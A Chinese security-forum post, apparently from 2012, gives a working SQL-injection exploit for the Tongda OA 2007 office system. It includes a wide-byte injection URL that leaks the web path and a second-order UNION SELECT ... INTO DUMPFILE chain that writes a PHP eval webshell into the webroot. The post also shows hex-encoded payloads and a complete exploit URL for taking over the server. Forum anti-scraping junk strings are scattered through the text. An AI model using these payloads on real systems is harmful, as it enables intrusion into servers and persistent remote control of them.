找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2383|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本
' Y1 ^. d) M% u. o
3 l3 N- b7 A& g) S2 v1 Y  [ ! M9 M' ]- i5 a, _0 t
Office Anywhere 2007 网络智能办公系统) `4 S  d; c5 m3 \9 ]
5 v, c) ~& R% b; C+ F
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..# a* }7 L. H# S

+ g; |7 k* C+ O7 v
( Z8 |( y1 h+ U7 a4 v" L( @* r" ~) {这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的! \/ q& A6 A+ [5 {5 D. ^+ Z: ]

5 z) W% @4 \2 L) K% T例如:SELECT * from USER where USER_ID='{$USERNAME}'  0 J7 i3 K  l, K
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了' o4 I# ^0 u  ^
# ]1 C4 x$ I, `: J# Y0 A- `
这个时候我们是不是可以组合起来使用哪?2 ^& \) N$ o, p2 H+ }5 S

$ C1 q6 v- u  ~7 }2 R4 i% O第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
$ ]- m  t7 T# {) N0 t0 Cunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
, c  g  A$ L/ ^$ p% w5 E* g1 { 5 m5 l# ^7 i6 E3 c7 c
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
5 k( }" y/ p7 t: N. X # C% n2 m% L" U: q) R8 m; @
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
' v- ]: I9 x/ N% M- \
$ i4 t' N4 s+ t$ {5 v  ^那么我们用字符串格式带入进行hex编码) L. e' x. G9 H7 E  T6 N# z! p. i
/ ~5 [8 O6 K3 C" Y$ y
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23, w0 `4 |) L: E

- A% ^! \# s  f3 w5 P8 G4 s9 l测试ok,获取oa的webshell
6 I7 D  G6 @1 V
, h. N$ h! ?* Z4 U- d4 W9 _3 n
( U8 \; b) M0 a9 S. B# p) w  hpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%239 M) ~% m; p% {4 s" s; v
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表